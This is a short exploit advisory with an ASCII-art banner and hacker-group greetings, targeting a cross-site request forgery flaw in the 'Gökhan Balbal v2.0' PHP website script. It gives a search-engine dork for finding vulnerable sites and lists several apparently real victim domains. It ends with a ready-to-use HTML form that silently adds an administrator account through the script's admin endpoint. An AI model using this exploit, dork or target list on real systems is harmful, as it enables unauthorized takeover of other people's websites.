.__ _____ _______ | |__ / | |___ __ _ _______ ____ | | / | | / / /_ _ __ _/ __ | Y / ^ /> < _/ | / ___/ |___| /____ |/__/_ \_____ /__| ___ > / |__| / / / _____________________________ / _____/_ _____/_ ___ _____ | __)_ / / / | \ ____ /_______ //_______ / ______ / / / / Gökhan Balbal v2.0 => Cross-Site Request Forgery Exploit (Add Admin) ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com [~] Þeker Insanlar : ZoRLu, ( milw00rm.com ), Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon KedAns-Dz, b3mb4m ########################################################### ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Gökhan Balbal |~Affected Version : v2.0 |~Software : http://wmscripti.com/php-scriptler/gokhan-balbal-kisisel-web-site-scripti.html |~RISK : High |~Google Keyword : "DiL BECERiLERi" "HoBi" "TASARIM BECERiLERi" ################++ DEMO ++ ####################################### http://www.melihakXturk.com http://egemenft.coXm http://onurarkan.Xga http://www.ferdiXkaya.net http://www.serXkanoduncu.com http://denizmXemege.com/ ##################++ Exploit ++ ###################################### <html> <body> <form action="http://[TARGET]/admin/ekleadmin2.php" method="POST"> <input type="hidden" name="kadi" value="knockout" /> <input type="hidden" name="sifre" value="password" /> <input type="hidden" name="Submit" value="Exploit!" /> <input type="submit" value="Submit request" /> </form> </body> </html> ############################################################